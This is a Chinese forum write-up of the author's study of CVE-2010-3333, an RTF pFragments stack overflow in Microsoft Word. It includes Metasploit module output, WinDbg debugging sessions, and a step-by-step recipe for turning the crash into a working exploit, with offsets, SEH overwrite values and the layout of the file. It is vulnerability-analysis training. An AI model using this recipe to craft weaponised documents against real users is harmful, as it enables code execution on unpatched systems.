-
-
[原创]新的漏洞分析体验:CVE-2010-3333 RTF栈缓冲区溢出漏洞
-
发表于: 2021-7-13 18:47 19950
-
这是《漏洞战争》里面分析的第二个栈溢出漏洞,虽然对于栈溢出这个概念本身已经很熟悉了,但是在分析这个漏洞的时候,书中介绍了如何使用Metasploit生成POC样本,以及Windbg调试的一些内容,我对于这些都不算特别熟悉,因为对我来说收获很大。这篇文章也会在这两方面有所介绍。
除了上面这两点,平时在工作中也会遇到好多RTF格式的漏洞利用病毒文件,虽然利用的可能并不是同一个漏洞,但是通过这个漏洞学习,相信也能够对其他RTF格式漏洞利用有所了解。
该漏洞存在于Microsoft Office XP SP3、Office 2003 SP3、Office 2007 SP2、Office 2010等多个版本中,由于Open XML文件格式转换器在处理RTF中的"pFragments
"属性值时,没有正确计算属性值占用的空间大小,导致了栈溢出漏洞的发生。
以下说法可能和官方术语不符,只是为了理解。
RTF(Rich Text Format)文件中的内容可以分为内容单元和控制单元两个部分,软件读取RTF文件的时候,根据控制单元的内容设置对应内容单元的格式与位置,显示在文档中。
下面示例说明:
上面这个文件的显示结果是这样的:
RTF文件由头部(header)和文档(document)两个部分组成<File> '{' <header> <document>'}'
:
可以和上面的示例文件内容做对比,对应关系还是蛮明显的。
这次分析的漏洞产生的原因是Open XML文件格式转换器在处理RTF中的"pFragments
"属性值时,没有正确计算属性值占用的空间大小,那么这个pFragments
属性值是怎么回事呢?
RTF文件中可以插入图形,图形在RTF文件中的格式如下:
其中{ \spp { \sn .......... } { \sp .............. } }
是这个图形的属性组,spp
是shape properties的缩写,sn
表示属性名称,sv
表示属性值。
而pFragments
就是其中的一个属性名称,它是一个数组结构,表示图形的可选附加部分,列出了图形的所有碎片。
软件版本:Microsoft Office 2003 SP3
现在已经弄清楚了RTF的格式以及pFragments的含义,由于这个漏洞不像之前分析的漏洞一样已知是哪个DLL文件(我甚至都不知道是不是有这么一个DLL文件)中存在问题,因此无法静态分析,只能直接开始调试。
输入msfconsole进入msf之后,首先要搜索找到相关的脚本,书中提供的命令是search cve-2010-3333
,我是用的是msf6,没有成功,后来使用了关键词pFragments
:
接下来使用use
指令指定exploit,使用info
查看exploit的具体信息:
可以看到target的第六项是6 Crash Target for Debugging
,使用set
指令选择第六个目标,然后exploit
指令就可以生成我们需要的PoC文件了。
这里使用的是Windbg,打开WINWORD.exe之后,使用Windbg附加到该进程,输入g
命令让进程继续运行,然后打开msf.rtf文件,可以看到Windbg中的输出:
根据错误信息Access violation确定应该是esi或者edi所在的位置访问出错了,看一下这两个位置的值是什么,使用db
查看字节数据:
看不出来有什么问题,esi处保存的应该就是复制的源字符串,要看一下所在内存的访问权限,使用!address
命令可以显示内存信息:
原因出现了,edi所在的位置只有读权限,而现在程序在尝试向其中写入数据。
注意到错误信息中的esp寄存器值为esp=00123d98
,esp处的数据为:
所以应该是程序在向栈中复制数据,由于没有判断数据长度,导致数据溢出到了不可写区域引发了异常。
一般来说分析到这里我会习惯找到出现问题的dll文件,定位到问题函数,然后直接到IDA里面进行静态分析,同时在OD的协助下完成对漏洞函数的理解,但是在《漏洞战争》这本书中,作者还在继续用windbg分析。为了熟悉windbg的使用,我也打算继续根据书中的流程进行分析。
由于一开始已经对漏洞进行了介绍,我们知道漏洞是在处理pFragments
属性的时候发生的,所以合理怀疑上面windbg输出内容中,esp除的数据应该来自于pFragments
属性内容,下面来验证一下。
看一下msf.rtf文件的内容:
由于文件过长,这里只截取了一部分数据,看起来不太一样,但是等一下,我们把pFragements
的内容复制到十六进制区域再看一下:
目前不太确定msf.rtf中前面的11111111ACC8
是什么意思,以及esp中前面的\Yd
是什么意思,接下来调试的时候可以注意,但是剩余内容都是一致的。
确定了是哪一句指令出现异常之后,需要定位这句指令在哪个函数中,因为现在windbg已经执行到了异常发生的时候,整个栈帧已经被pFragments的数据覆盖了,无法获取有效信息,所以需要重新附加到WINWORD上,然后在异常发生地址0x30E9EB88
这里下一个断点,继续执行:
此时还没有发生异常,栈帧中一切正常,使用kb
指令显示调用堆栈及栈上的前三个参数:
由于缺少symbol文件,所以这个栈帧是有可能出错的,不过这里还是可以分析出来的。
第一个是当前函数栈帧,要看下一行00123e00 30f4a597 00123f88 00123f3c 00000000 mso!Ordinal753+0x306e
,用ub
指令查看指定地址之前的汇编代码:
漏洞代码出现在函数0x30F4CC5D
调用之中,所以要再一次载入程序,在0x30F4CC5D
下断点,然后继续执行
漏洞代码的地址x30e9eb88
,之后使用F10
单步调试,寻找位于该地址附近的函数调用:
一直单步到这里,有一个函数调用,函数地址是0x30E9EB62
,和漏洞代码地址很接近,应该就是这里了,F11
步入:
看一下这里的汇编代码:
需要注意esi、edi、ecx这三个寄存器的值,
所以数据要复制到0x123dc0
。
这里经过第一步运算后ecx的值是0xC8AC
,然后进行了右移两位(除以4)的操作,因为rep movs dword
是以四个字节为一个单位进行复制的。
源数据所在地址为0x1104000C
。
注意在上面我查看edi处的数据时,使用的是db edi-4
的命令,可以看到\Yd
已经在栈中了,所以这三个字符和数据的复制操作没什么关系,而ecx的值0xC8AC
正是msf.rtf中保存的值,所以这两个字节用来保存pFragments的长度。
查看一下目前的寄存器情况:
数据复制的目标地址edi是0x123dc0
,而此时栈帧基址ebp是0x123dd0
,两者仅相差16个字节。所以如果想要覆盖返回地址,一共需要24个字节。
上面的分析流程和之前分析CVE-2010-2883还是有很大区别的,之前分析的poc文件是一个可以成功进行漏洞利用并攻击的样本,里面包含了shellcode。而这次则是从一个引发异常的样本出发,分析出漏洞位置以及如何进行漏洞利用。
分析到这里,已经可以看出这是一个很典型的栈溢出漏洞,可以把返回地址覆盖成jmp esp
的地址,然后把shellcode放在pFragments
中,实现漏洞利用。
想要构造POC文件,还需要进行一些静态分析,因为在执行完数据的复制之后,还要执行一些代码才能到达覆盖的返回地址处,如果只是简单的把返回地址和shellcode组合在一起,在到达返回地址之前,会首先触发异常。
注:我之所以能确定不能简单组合是因为自己试了一下,由于栈中原本的数据被覆盖,导致后面的函数执行出现异常,所以需要确定哪部分栈中的数据需要进行特殊处理。
根据一开始的错误信息:
使用lm
指令显示模块信息(因为电脑了有两个mso.dll,所以这一步还是很有必要的):
这里找到了mso.dll的位置,在IDA中分析。
漏洞函数的调用发生在sub_30F4CC5D
函数中,漏洞函数本身只是在做一个数据的复制,并没有自己的栈帧,所以上面覆盖的返回地址是sub_30F4CC5D
的返回地址。
在执行完漏洞函数之后,程序又调用了另一个函数,看下图:
调用了sub_30F4CB1D
函数,如果这个函数返回值为0,就会达到函数结束的代码,
所以我们需要让sub_30F4CB1D
函数的返回值为0。
在sub_30F4CB1D
函数中:
所以要让第五个参数(第一个push到栈中的参数)为0。
对之前msf生成的poc文件进行修改,为了方便测试,使用的payload是在0day中提供的很简单的弹窗程序。
除此之外,注意到上面图片中最后的指令是retn 14h
,所以需要在返回地址和payload之间添加20个字节的垃圾数据。
注意这个测试文件,返回地址后面的垃圾数据中,每四个字节的内容都不一样,这样可以更方便地确定是哪块数据需要特殊处理。
还是在0x30F4CC5D
下断点,然后单步调试。在执行完漏洞函数之后,到达第一个push的位置
所以最后一个参数是0x94949494
所在的位置了,为了再次确定,可以步入到sub_30F4CB1D
函数中,执行到比较是否等于0的指令时:
所以我们需要把0x94949494
修改为0。
最后得到的poc文件:
保存成rtf文件,双击打开,payload成功执行:
其实到这里整个漏洞利用流程就结束了,但是在《漏洞战争》中还提到了一些其他问题,在这里也进行一下总结。
在上面的实验中,我直接使用了书中提供的返回地址0x0026762f
,这个地址在0ffice2003中是通用的,但是在office2007中则会触发异常。
其实我一开始安装的是office2007,结果实验结果和书里说的不一样,后来换成了office2003。现在再试一下office2007。
我遇到的问题就是msf生成的poc文件触发异常的位置不对。
在office2007的环境下打开poc文件之后
可以看到发生异常的位置不太对,这部分代码其实在书中后面也涉及到了,而且我在调试office2003的环境时也有碰到,
就是上图中“诡异的运算”那里。这个异常应该是我在上文提到的特殊位置如果不设置为0会遇到的异常。
如果把特殊位置设置成0,在office2007的环境下就会直接跳转到覆盖的返回地址那里。
所以msf生成的poc文件并没有将数据复制到不可写位置,如果查看一下触发异常时的栈帧情况:
可以看到数据是在0x11ffa4
开始复制的,而复制的长度占用了两个字节,无论如何都无法写到0x130000
,也就是不可写内存所在位置。
我也不清楚为什么结果是这样的,毕竟书上的环境也是office2007。
虽然没有正常触发异常,但是从结果来看漏洞还是存在的。
所以如果是在office2007的环境,可以通过覆盖 SEH handler地址的方式进行漏洞利用。
书中提到了可以使用msf的pattern_create和pattern_offset定位偏移量,Exploit编写系列教程(参考资料3)中对这个方法进行了介绍,我尝试使用里面介绍的方法对SEH handler的位置进行判断。
找到pattern_create.rb和pattern_offset.rb所在的目录,执行ruby .\pattern_create.rb -l 50000 > test.txt
这个时候得到的文件内容为:
注意到和msf生成的poc中内容是一样的,所以其实不需要自己再额外生成一个测试文件了,直接使用之前的poc文件也可以。
不过我还是又自己创建了一个rtf,test.rtf,要在010editor中把test.txt中的字符转化成对应的ascii值,然后替换成pFragments
的内容。
回到windbg,同样的步骤,打开test.rtf,会在同样的异常位置暂停下来,再按一下F5让它继续执行,程序应该会尝试执行SEH handler(已经被覆盖掉了),由于覆盖的是随机地址,无法执行,所以会再一次到达异常:
注意到此时的地址0x37714836,这个地址就是覆盖之后的SEH handler地址。
执行ruby .\pattern_offset.rb -q 0x37714836 -l 50000
(这个长度取一个比较大的值就行),查看这个地址的偏移,得到
应该就是5960,不然距离也太远了。
所以5960个字节之后的四个字节就是SEH Handler的地址,可以测试一下这个结论,在test.rtf中搜索36487137
(这么看来直接搜索也可以,(lll¬ω¬)),替换成41414141
,再次调试,输出:
确实断在了41414141
这里,结论是正确的。
现在已经找到了SEH Handler的位置,按照书中说的,把这里的数值修改成0x0B0B2800
,把前四个字节修改成0xEB06EB04
,然后把shellcode放在SEH Handler的后面,再次打开test.rtf,成功得到弹窗:
其实书中对poc的结构已经进行了说明
框架是这样的
添加四字节长度信息,这里长度足够就可以
添加20字节垃圾数据,再加上四字节返回地址
添加16字节垃圾数据,再加上四字节的\x00
添加5912字节垃圾数据,再加上四字节EB06EB04
和四字节0B0B2800
,然后就是shellcode了。这部分内容太大,不再粘贴,完整文件见附件。
最终得到的文件在两个环境下都可以正常弹窗。
bp
:下断点
ba
:内存断点,ba access size [addr]
bl
:列出已存在断点
bc
:根据上面列出断点的标号,删除对应断点
g
:继续运行
db
:查看字节数据
db
、dw
、dd
、dq
:字节、字、双字、四字
da
、du
:ascii、unicode
dt
:显示变量结构
!address
命令可以显示内存信息
ub
指令查看指定地址之前的汇编代码
uf
:显示之后的汇编代码
r
:查看寄存器
这次的漏洞分析和之前的流程都不同,从一个引发崩溃的poc文件触发,定位漏洞位置,判断返回地址的偏移,从而自己构造exploit文件。
除此之外,第一次没有使用OD进行分析,windbg的指令函数蛮强大的,就是不熟练,所以很多时候都会感觉不知道要干什么。
使用msf生成了poc文件,还接触了msf的pattern_create和pattern_offset,虽然这次没有用到多少功能,但是已经感觉到了它的便利性。
之前确认SEH Handler的位置都是在OD里面看栈上数据的标注,而这次则是在OD中让代码继续执行,查看EIP的值,其实过程中有很多不确定,但最终还是成功了,。
总体来说这次漏洞分析的过程还是比较顺利的,大致熟悉了Windbg的命令之后,我其实并没有完全跟着书上的流程走,而是根据当时的分析情况,从自己的疑惑出发逐步得到了最终结论。也发现了泉哥组织翻译的exploit编写系列教程,干货非常多,也要加入学习列表了。
感谢阅读~
{\rtf\ansi\deff0{\fonttbl{\f0\froman Tms Rmn;}{\f1\fdecor Symbol;}{\f2\fswiss Helv;}}
{\colortbl;\red0\green0\blue0;\red0\green0\blue255;\red0\green255\blue255;\red0\green255\blue0;\red255\green0\blue255;\red255\green0\blue0;\red255\green255\blue0;\red255\green255\blue255;}
{\stylesheet{\fs20 \snext0Normal;}}
{\info{\author John Doe}{\creatim\yr1990\mo7\dy30\hr10\min48}{\version1}{\edmins0}{\nofpages1}{\nofwords0}{\nofchars0}{\vern8351}}
\widoctrl\ftnbj \sectd\linex0\endnhere \pard\plain \fs20 This
is
plain text.\par}
{\rtf\ansi\deff0{\fonttbl{\f0\froman Tms Rmn;}{\f1\fdecor Symbol;}{\f2\fswiss Helv;}}
{\colortbl;\red0\green0\blue0;\red0\green0\blue255;\red0\green255\blue255;\red0\green255\blue0;\red255\green0\blue255;\red255\green0\blue0;\red255\green255\blue0;\red255\green255\blue255;}
{\stylesheet{\fs20 \snext0Normal;}}
{\info{\author John Doe}{\creatim\yr1990\mo7\dy30\hr10\min48}{\version1}{\edmins0}{\nofpages1}{\nofwords0}{\nofchars0}{\vern8351}}
\widoctrl\ftnbj \sectd\linex0\endnhere \pard\plain \fs20 This
is
plain text.\par}
<header>
\rtf <charset> \deff? <fonttbl> <filetbl>? <colortbl>? <stylesheet>? <listtables>? <revtbl>?
<document>
<info>? <docfmt>
*
<section>
+
<header>
\rtf <charset> \deff? <fonttbl> <filetbl>? <colortbl>? <stylesheet>? <listtables>? <revtbl>?
<document>
<info>? <docfmt>
*
<section>
+
{ \shp ........ { \
*
\shpinst { \sp { \sn .......... } { \sv .............. } } }
{ \shprslt ............... } }
{ \shp ........ { \
*
\shpinst { \sp { \sn .......... } { \sv .............. } } }
{ \shprslt ............... } }
msf6 > search pFragments
Matching Modules
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
# Name Disclosure Date Rank Check Description
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
0
exploit
/
windows
/
fileformat
/
ms10_087_rtf_pfragments_bof
2010
-
11
-
09
great No MS10
-
087
Microsoft Word RTF pFragments Stack
Buffer
Overflow (
File
Format
)
Interact with a module by name
or
index. For example info
0
, use
0
or
use exploit
/
windows
/
fileformat
/
ms10_087_rtf_pfragments_bof
msf6 > search pFragments
Matching Modules
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
# Name Disclosure Date Rank Check Description
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
0
exploit
/
windows
/
fileformat
/
ms10_087_rtf_pfragments_bof
2010
-
11
-
09
great No MS10
-
087
Microsoft Word RTF pFragments Stack
Buffer
Overflow (
File
Format
)
Interact with a module by name
or
index. For example info
0
, use
0
or
use exploit
/
windows
/
fileformat
/
ms10_087_rtf_pfragments_bof
msf6 > use exploit
/
windows
/
fileformat
/
ms10_087_rtf_pfragments_bof
[
*
] No payload configured, defaulting to windows
/
meterpreter
/
reverse_tcp
msf6 exploit(windows
/
fileformat
/
ms10_087_rtf_pfragments_bof) > info
Name: MS10
-
087
Microsoft Word RTF pFragments Stack
Buffer
Overflow (
File
Format
)
Module: exploit
/
windows
/
fileformat
/
ms10_087_rtf_pfragments_bof
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed:
2010
-
11
-
09
Provided by:
wushi of team509
unknown
jduck <jduck@metasploit.com>
DJ Manila Ice, Vesh, CA
Available targets:
Id
Name
-
-
-
-
-
-
0
Automatic
1
Microsoft Office
2002
SP3 English on Windows XP SP3 English
2
Microsoft Office
2003
SP3 English on Windows XP SP3 English
3
Microsoft Office
2007
SP0 English on Windows XP SP3 English
4
Microsoft Office
2007
SP0 English on Windows Vista SP0 English
5
Microsoft Office
2007
SP0 English on Windows
7
SP0 English
6
Crash Target
for
Debugging
Check supported:
No
Basic options:
Name Current Setting Required Description
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
FILENAME msf.rtf yes The
file
name.
Payload information:
Space:
512
Avoid:
1
characters
Description:
This module exploits a stack
-
based
buffer
overflow
in
the handling
of the
'pFragments'
shape
property
within the Microsoft Word RTF
parser.
All
versions of Microsoft Office
2010
,
2007
,
2003
,
and
XP
prior to the release of the MS10
-
087
bulletin are vulnerable. This
module does
not
attempt to exploit the vulnerability via Microsoft
Outlook. The Microsoft Word RTF parser was only used by default
in
versions of Microsoft Word itself prior to Office
2007.
With the
release of Office
2007
, Microsoft began using the Word RTF parser,
by default, to handle rich
-
text messages within Outlook as well. It
was possible to configure Outlook
2003
and
earlier to use the
Microsoft Word engine too, but it was
not
a default setting. It
appears as though Microsoft Office
2000
is
not
vulnerable. It
is
unlikely that Microsoft will confirm
or
deny this since Office
2000
has reached its support cycle end
-
of
-
life.
References:
https:
/
/
nvd.nist.gov
/
vuln
/
detail
/
CVE
-
2010
-
3333
OSVDB (
69085
)
https:
/
/
docs.microsoft.com
/
en
-
us
/
security
-
updates
/
SecurityBulletins
/
2010
/
MS10
-
087
http:
/
/
www.securityfocus.com
/
bid
/
44652
http:
/
/
labs.idefense.com
/
intelligence
/
vulnerabilities
/
display.php?
id
=
880
msf6 exploit(windows
/
fileformat
/
ms10_087_rtf_pfragments_bof) >
set
target
6
target
=
>
6
msf6 exploit(windows
/
fileformat
/
ms10_087_rtf_pfragments_bof) > exploit
[
*
] Creating
'msf.rtf'
file
...
[
+
] msf.rtf stored at
/
root
/
.msf4
/
local
/
msf.rtf
msf6 > use exploit
/
windows
/
fileformat
/
ms10_087_rtf_pfragments_bof
[
*
] No payload configured, defaulting to windows
/
meterpreter
/
reverse_tcp
msf6 exploit(windows
/
fileformat
/
ms10_087_rtf_pfragments_bof) > info
Name: MS10
-
087
Microsoft Word RTF pFragments Stack
Buffer
Overflow (
File
Format
)
Module: exploit
/
windows
/
fileformat
/
ms10_087_rtf_pfragments_bof
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed:
2010
-
11
-
09
Provided by:
wushi of team509
unknown
jduck <jduck@metasploit.com>
DJ Manila Ice, Vesh, CA
Available targets:
Id
Name
-
-
-
-
-
-
0
Automatic
1
Microsoft Office
2002
SP3 English on Windows XP SP3 English
2
Microsoft Office
2003
SP3 English on Windows XP SP3 English
3
Microsoft Office
2007
SP0 English on Windows XP SP3 English
4
Microsoft Office
2007
SP0 English on Windows Vista SP0 English
5
Microsoft Office
2007
SP0 English on Windows
7
SP0 English
6
Crash Target
for
Debugging
Check supported:
No
Basic options:
Name Current Setting Required Description
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
FILENAME msf.rtf yes The
file
name.
Payload information:
Space:
512
Avoid:
1
characters
Description:
This module exploits a stack
-
based
buffer
overflow
in
the handling
of the
'pFragments'
shape
property
within the Microsoft Word RTF
parser.
All
versions of Microsoft Office
2010
,
2007
,
2003
,
and
XP
prior to the release of the MS10
-
087
bulletin are vulnerable. This
module does
not
attempt to exploit the vulnerability via Microsoft
Outlook. The Microsoft Word RTF parser was only used by default
in
versions of Microsoft Word itself prior to Office
2007.
With the
release of Office
2007
, Microsoft began using the Word RTF parser,
by default, to handle rich
-
text messages within Outlook as well. It
was possible to configure Outlook
2003
and
earlier to use the
Microsoft Word engine too, but it was
not
a default setting. It
appears as though Microsoft Office
2000
is
not
vulnerable. It
is
unlikely that Microsoft will confirm
or
deny this since Office
2000
has reached its support cycle end
-
of
-
life.
References:
https:
/
/
nvd.nist.gov
/
vuln
/
detail
/
CVE
-
2010
-
3333
OSVDB (
69085
)
https:
/
/
docs.microsoft.com
/
en
-
us
/
security
-
updates
/
SecurityBulletins
/
2010
/
MS10
-
087
http:
/
/
www.securityfocus.com
/
bid
/
44652
http:
/
/
labs.idefense.com
/
intelligence
/
vulnerabilities
/
display.php?
id
=
880
msf6 exploit(windows
/
fileformat
/
ms10_087_rtf_pfragments_bof) >
set
target
6
target
=
>
6
msf6 exploit(windows
/
fileformat
/
ms10_087_rtf_pfragments_bof) > exploit
[
*
] Creating
'msf.rtf'
file
...
[
+
] msf.rtf stored at
/
root
/
.msf4
/
local
/
msf.rtf
0
:
003
> g
ModLoad:
77b40000
77b62000
C:\WINDOWS\system32\appHelp.dll
ModLoad:
77a20000
77a74000
C:\WINDOWS\System32\cscui.dll
ModLoad:
76600000
7661d000
C:\WINDOWS\System32\CSCDLL.dll
ModLoad:
5b860000
5b8b5000
C:\WINDOWS\system32\netapi32.dll
ModLoad:
76990000
769b5000
C:\WINDOWS\system32\ntshrui.dll
ModLoad:
76b20000
76b31000
C:\WINDOWS\system32\ATL.DLL
ModLoad:
769c0000
76a74000
C:\WINDOWS\system32\USERENV.dll
ModLoad:
75f80000
7607d000
C:\WINDOWS\system32\browseui.dll
ModLoad:
7e290000
7e401000
C:\WINDOWS\system32\shdocvw.dll
ModLoad:
754d0000
75550000
C:\WINDOWS\system32\CRYPTUI.dll
ModLoad:
76c30000
76c5e000
C:\WINDOWS\system32\WINTRUST.dll
ModLoad:
76c90000
76cb8000
C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad:
76f60000
76f8c000
C:\WINDOWS\system32\WLDAP32.dll
ModLoad:
76980000
76988000
C:\WINDOWS\system32\LINKINFO.dll
ModLoad:
36c30000
36c39000
C:\Program Files\Microsoft Office\OFFICE11\msostyle.dll
ModLoad:
39800000
399b3000
C:\Program Files\Microsoft Office\OFFICE11\GdiPlus.DLL
ModLoad:
76f50000
76f58000
C:\WINDOWS\system32\WTSAPI32.DLL
ModLoad:
76360000
76370000
C:\WINDOWS\system32\WINSTA.dll
(d68.e9c): Access violation
-
code c0000005 (first chance)
First chance exceptions are reported before
any
exception handling.
This exception may be expected
and
handled.
eax
=
0000c8ac
ebx
=
05000000
ecx
=
0000019b
edx
=
00000000
esi
=
1104c24c
edi
=
00130000
eip
=
30e9eb88
esp
=
00123d98
ebp
=
00123dd0
iopl
=
0
nv up ei pl nz na pe nc
cs
=
001b
ss
=
0023
ds
=
0023
es
=
0023
fs
=
003b
gs
=
0000
efl
=
00010206
*
*
*
ERROR: Symbol
file
could
not
be found. Defaulted to export symbols
for
C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll
-
mso!Ordinal6426
+
0x64d
:
30e9eb88
f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0
:
003
> g
ModLoad:
77b40000
77b62000
C:\WINDOWS\system32\appHelp.dll
ModLoad:
77a20000
77a74000
C:\WINDOWS\System32\cscui.dll
ModLoad:
76600000
7661d000
C:\WINDOWS\System32\CSCDLL.dll
ModLoad:
5b860000
5b8b5000
C:\WINDOWS\system32\netapi32.dll
ModLoad:
76990000
769b5000
C:\WINDOWS\system32\ntshrui.dll
ModLoad:
76b20000
76b31000
C:\WINDOWS\system32\ATL.DLL
ModLoad:
769c0000
76a74000
C:\WINDOWS\system32\USERENV.dll
ModLoad:
75f80000
7607d000
C:\WINDOWS\system32\browseui.dll
ModLoad:
7e290000
7e401000
C:\WINDOWS\system32\shdocvw.dll
ModLoad:
754d0000
75550000
C:\WINDOWS\system32\CRYPTUI.dll
ModLoad:
76c30000
76c5e000
C:\WINDOWS\system32\WINTRUST.dll
ModLoad:
76c90000
76cb8000
C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad:
76f60000
76f8c000
C:\WINDOWS\system32\WLDAP32.dll
ModLoad:
76980000
76988000
C:\WINDOWS\system32\LINKINFO.dll
ModLoad:
36c30000
36c39000
C:\Program Files\Microsoft Office\OFFICE11\msostyle.dll
ModLoad:
39800000
399b3000
C:\Program Files\Microsoft Office\OFFICE11\GdiPlus.DLL
ModLoad:
76f50000
76f58000
C:\WINDOWS\system32\WTSAPI32.DLL
ModLoad:
76360000
76370000
C:\WINDOWS\system32\WINSTA.dll
(d68.e9c): Access violation
-
code c0000005 (first chance)
First chance exceptions are reported before
any
exception handling.
This exception may be expected
and
handled.
eax
=
0000c8ac
ebx
=
05000000
ecx
=
0000019b
edx
=
00000000
esi
=
1104c24c
edi
=
00130000
eip
=
30e9eb88
esp
=
00123d98
ebp
=
00123dd0
iopl
=
0
nv up ei pl nz na pe nc
cs
=
001b
ss
=
0023
ds
=
0023
es
=
0023
fs
=
003b
gs
=
0000
efl
=
00010206
*
*
*
ERROR: Symbol
file
could
not
be found. Defaulted to export symbols
for
C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll
-
mso!Ordinal6426
+
0x64d
:
30e9eb88
f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0
:
000
> db esi
1104c24c
4c
74
36
4c
74
37
4c
74
-
38
4c
74
39
4c
75
30
4c
Lt6Lt7Lt8Lt9Lu0L
1104c25c
75
31
4c
75
32
4c
75
33
-
4c
75
34
4c
75
35
4c
75
u1Lu2Lu3Lu4Lu5Lu
1104c26c
36
4c
75
37
4c
75
38
4c
-
75
39
4c
76
30
4c
76
31
6Lu7Lu8Lu9Lv0Lv1
1104c27c
4c
76
32
4c
76
33
4c
76
-
34
4c
76
35
4c
76
36
4c
Lv2Lv3Lv4Lv5Lv6L
1104c28c
76
37
4c
76
38
4c
76
39
-
4c
77
30
4c
77
31
4c
77
v7Lv8Lv9Lw0Lw1Lw
1104c29c
32
4c
77
33
4c
77
34
4c
-
77
35
4c
77
36
4c
77
37
2Lw3Lw4Lw5Lw6Lw7
1104c2ac
4c
77
38
4c
77
39
4c
78
-
30
4c
78
31
4c
78
32
4c
Lw8Lw9Lx0Lx1Lx2L
1104c2bc
78
33
4c
78
34
4c
78
35
-
4c
78
36
4c
78
37
4c
78
x3Lx4Lx5Lx6Lx7Lx
0
:
000
> db edi
00130000
41
63
74
78
20
00
00
00
-
01
00
00
00
98
24
00
00
Actx ........$..
00130010
c4
00
00
00
00
00
00
00
-
20
00
00
00
00
00
00
00
........ .......
00130020
14
00
00
00
01
00
00
00
-
06
00
00
00
34
00
00
00
............
4.
..
00130030
14
01
00
00
01
00
00
00
-
00
00
00
00
00
00
00
00
................
00130040
00
00
00
00
00
00
00
00
-
00
00
00
00
02
00
00
00
................
00130050
00
00
00
00
00
00
00
00
-
00
00
00
00
14
02
00
00
................
00130060
9c
01
00
00
00
00
00
00
-
5b
49
59
2d
b0
03
00
00
........[IY
-
....
00130070
32
00
00
00
e4
03
00
00
-
d2
02
00
00
00
00
00
00
2.
..............
0
:
000
> db esi
1104c24c
4c
74
36
4c
74
37
4c
74
-
38
4c
74
39
4c
75
30
4c
Lt6Lt7Lt8Lt9Lu0L
1104c25c
75
31
4c
75
32
4c
75
33
-
4c
75
34
4c
75
35
4c
75
u1Lu2Lu3Lu4Lu5Lu
1104c26c
36
4c
75
37
4c
75
38
4c
-
75
39
4c
76
30
4c
76
31
6Lu7Lu8Lu9Lv0Lv1
1104c27c
4c
76
32
4c
76
33
4c
76
-
34
4c
76
35
4c
76
36
4c
Lv2Lv3Lv4Lv5Lv6L
1104c28c
76
37
4c
76
38
4c
76
39
-
4c
77
30
4c
77
31
4c
77
v7Lv8Lv9Lw0Lw1Lw
1104c29c
32
4c
77
33
4c
77
34
4c
-
77
35
4c
77
36
4c
77
37
2Lw3Lw4Lw5Lw6Lw7
1104c2ac
4c
77
38
4c
77
39
4c
78
-
30
4c
78
31
4c
78
32
4c
Lw8Lw9Lx0Lx1Lx2L
1104c2bc
78
33
4c
78
34
4c
78
35
-
4c
78
36
4c
78
37
4c
78
x3Lx4Lx5Lx6Lx7Lx
0
:
000
> db edi
00130000
41
63
74
78
20
00
00
00
-
01
00
00
00
98
24
00
00
Actx ........$..
00130010
c4
00
00
00
00
00
00
00
-
20
00
00
00
00
00
00
00
........ .......
00130020
14
00
00
00
01
00
00
00
-
06
00
00
00
34
00
00
00
............
4.
..
00130030
14
01
00
00
01
00
00
00
-
00
00
00
00
00
00
00
00
................
00130040
00
00
00
00
00
00
00
00
-
00
00
00
00
02
00
00
00
................
00130050
00
00
00
00
00
00
00
00
-
00
00
00
00
14
02
00
00
................
00130060
9c
01
00
00
00
00
00
00
-
5b
49
59
2d
b0
03
00
00
........[IY
-
....
00130070
32
00
00
00
e4
03
00
00
-
d2
02
00
00
00
00
00
00
2.
..............
0
:
000
> !address esi
Usage: <unclassified>
Allocation Base:
11040000
Base Address:
11040000
End Address:
1e64c000
Region Size:
0d60c000
Type
:
00020000
MEM_PRIVATE
State:
00001000
MEM_COMMIT
Protect:
00000004
PAGE_READWRITE
0
:
000
> !address edi
Usage: MemoryMappedFile
Allocation Base:
00130000
Base Address:
00130000
End Address:
00133000
Region Size:
00003000
Type
:
00040000
MEM_MAPPED
State:
00001000
MEM_COMMIT
Protect:
00000002
PAGE_READONLY
Mapped
file
name: PageFile
0
:
000
> !address esi
Usage: <unclassified>
Allocation Base:
11040000
Base Address:
11040000
End Address:
1e64c000
Region Size:
0d60c000
Type
:
00020000
MEM_PRIVATE
State:
00001000
MEM_COMMIT
Protect:
00000004
PAGE_READWRITE
0
:
000
> !address edi
Usage: MemoryMappedFile
Allocation Base:
00130000
Base Address:
00130000
End Address:
00133000
Region Size:
00003000
Type
:
00040000
MEM_MAPPED
State:
00001000
MEM_COMMIT
Protect:
00000002
PAGE_READONLY
Mapped
file
name: PageFile
0
:
000
> db esp
00123d98
f0
10
49
01
88
3f
12
00
-
96
cc f4
30
f0
10
49
01
..I..?.....
0.
.I.
00123da8
c0
3d
12
00
00
00
00
00
-
00
00
00
00
00
00
00
00
.
=
..............
00123db8
00
00
00
00
a8
5c
59
64
-
41
61
30
41
61
31
41
61
.....\YdAa0Aa1Aa
00123dc8
32
41
61
33
41
61
34
41
-
61
35
41
61
36
41
61
37
2Aa3Aa4Aa5Aa6Aa7
00123dd8
41
61
38
41
61
39
41
62
-
30
41
62
31
41
62
32
41
Aa8Aa9Ab0Ab1Ab2A
00123de8
62
33
41
62
34
41
62
35
-
41
62
36
41
62
37
41
62
b3Ab4Ab5Ab6Ab7Ab
00123df8
38
41
62
39
41
63
30
41
-
63
31
41
63
32
41
63
33
